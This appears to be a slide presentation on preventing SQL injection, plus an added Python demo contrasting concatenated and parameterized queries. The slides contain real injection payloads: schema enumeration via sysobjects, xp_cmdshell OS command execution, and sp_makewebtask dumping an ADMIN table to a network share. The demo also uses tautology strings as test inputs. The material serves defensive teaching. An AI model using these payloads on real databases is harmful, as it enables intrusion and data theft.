How to prevent SQL injection attack
Page 2
• Introduction
• SQL Injection statistics over 6 years
• Risks Posed By SQL Injection
• How to prevent SQL Injection correctly
• Questions & Answers
Page 3: How to prevent SQL injection attack
• This presentation is going to tell you not only some information about SQL injection but also more important things: how to prevent SQL injection correctly
Page 4
– Execute multiple SQL statements
– Call built-in stored procedures
Page 6
// Vulnerable: user-supplied username and password are concatenated straight into the query text
sql = "select * from users where username = '" + username + "' and password = '" + password + "'";
Pages 7-12: SQL Injection statistics (chart slides)
Page 13: Risks Posed by SQL Injection
Page 14
• Get some important information with select statements
– Get Server Version
(SELECT name from sysobject Where xtype='U'))
– Get Columns List
' OR 1=CONVERT(int,(SELECT TOP 1 [name] FROM syscolumns WHERE [ID] =(SELECT [ID] FROM sysobjects WHERE
Page 17: System Compromise
• Extended Stored Procedures
– '; EXEC master.dbo.xp_cmdshell 'Net user >c:\inetpub\wwwroot\users.txt'
– '; EXEC sp_makewebtask '\\10.1.1.2\public\output.html', 'SELECT * FROM ADMIN'
Page 18: How to prevent SQL Injection
Page 19
// Parameterized query: the user input is bound as a value and never becomes part of the SQL text.
// The first part of the query string is cut off on the slide; it is reconstructed here from the page-6 query.
string sql = "SELECT * FROM users WHERE username = @Username "
           + "AND password = @Password";
SqlCommand command = new SqlCommand(sql, connection);
command.Parameters.Add("@Username", SqlDbType.VarChar).Value = UserName.Text;
command.Parameters.Add("@Password", SqlDbType.VarChar).Value = Password.Text;
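The following is an added example, not code from the slides: it puts the page-6 concatenated query and the page-19 parameterized query side by side and runs both against the same input, so the difference is observable rather than asserted. SQLite is used as a stand-in for SQL Server (its driver uses `?` placeholders where ADO.NET uses `@Username` and `@Password`), the `users` table and its one account are constructed sample data, and the function names `login_concat`, `login_parameterized` and `compare` are this example's own.

```python
import sqlite3

# Constructed sample data, not taken from the slides: one account in a minimal users table.
SAMPLE_USERS = [("alice", "s3cret")]


def make_db():
    """Build an in-memory SQLite database standing in for the slides' SQL Server users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_concat(conn, username, password):
    """Page-6 pattern: the query text is assembled by string concatenation (vulnerable)."""
    sql = ("select * from users where username = '" + username
           + "' and password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    """Page-19 pattern: placeholders in the SQL, values bound separately by the driver.

    sqlite3 uses '?' where ADO.NET uses the named @Username / @Password parameters;
    whatever the value contains, it is compared as data and never parsed as SQL.
    """
    sql = "select * from users where username = ? and password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def compare(username, password):
    """Run the same credentials through both versions; return how many rows each one matched."""
    conn = make_db()
    try:
        return {
            "concat": len(login_concat(conn, username, password)),
            "parameterized": len(login_parameterized(conn, username, password)),
        }
    finally:
        conn.close()


if __name__ == "__main__":
    # legitimate credentials: both versions match exactly one row
    print(compare("alice", "s3cret"))
    # wrong password: both versions match nothing
    print(compare("alice", "wrong"))
    # tautology in the password field (constructed test input): the concatenated query becomes
    #   ... username = 'alice' and password = 'x' or '1'='1'
    # which is true for every row, while the bound parameter is just a string that matches nothing
    print(compare("alice", "x' or '1'='1"))
    # comment sequence in the username field cuts the password check off the concatenated query
    print(compare("nobody' or 1=1 --", "whatever"))
```

The point to take from the output is that the parameterized version behaves identically for legitimate input and simply returns no row for the crafted input; there is no escaping logic to get wrong, because the driver never lets the value reach the SQL parser. The same holds for the stored-procedure approach on the next slide only as long as the procedure itself does not concatenate its arguments into dynamic SQL.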
Page 20: STORED PROCEDURES
• Less vulnerable to SQL injection attacks
• Added security via EXECUTE permission
SqlCommand command = new SqlCommand("Users_GetUser", connection);
command.CommandType = CommandType.StoredProcedure; // the name is invoked as a procedure, not executed as query text
Page 21
• SQL injection is one of the most important problems in web application security
• As shown on page 7, the number of vulnerabilities reported more than tripled from January-June 2001 to the same period in 2006, and this figure is expected to keep increasing in the near future.
• The solutions for SQL injection are not very complicated, but they require good management to be deployed properly
• Don't underestimate SQL injection; tackle the problem with a more holistic and systematic approach